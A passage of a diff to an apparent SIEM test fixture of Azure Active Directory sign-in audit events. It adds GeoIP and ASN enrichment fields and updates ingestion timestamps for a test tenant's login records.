Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6050,6 +6662,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6130,7 +6754,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970332800Z", + "ingested": "2021-12-14T14:49:08.047446119Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6170,6 +6794,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6250,7 +6886,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970338400Z", + "ingested": "2021-12-14T14:49:08.047446697Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6290,6 +6926,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6370,7 +7018,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970344Z", + "ingested": "2021-12-14T14:49:08.047447173Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6410,6 +7058,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6490,7 +7150,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970349600Z", + "ingested": "2021-12-14T14:49:08.047447690Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6530,6 +7190,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6610,7 +7282,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970355100Z", + "ingested": "2021-12-14T14:49:08.047448192Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6650,6 +7322,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -6730,7 +7414,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970360700Z", + "ingested": "2021-12-14T14:49:08.047448790Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6770,6 +7454,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -6850,7 +7546,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970366400Z", + "ingested": "2021-12-14T14:49:08.047449362Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -6890,6 +7586,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ @@ -6970,7 +7678,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970372200Z", + "ingested": "2021-12-14T14:49:08.047449825Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7010,6 +7718,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7090,7 +7810,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970377900Z", + "ingested": "2021-12-14T14:49:08.047450343Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7130,6 +7850,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7210,7 +7942,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970383500Z", + "ingested": "2021-12-14T14:49:08.047450811Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7250,6 +7982,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7330,7 +8074,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970389Z", + "ingested": "2021-12-14T14:49:08.047451272Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7370,6 +8114,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7450,7 +8206,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970394600Z", + "ingested": "2021-12-14T14:49:08.047451750Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; 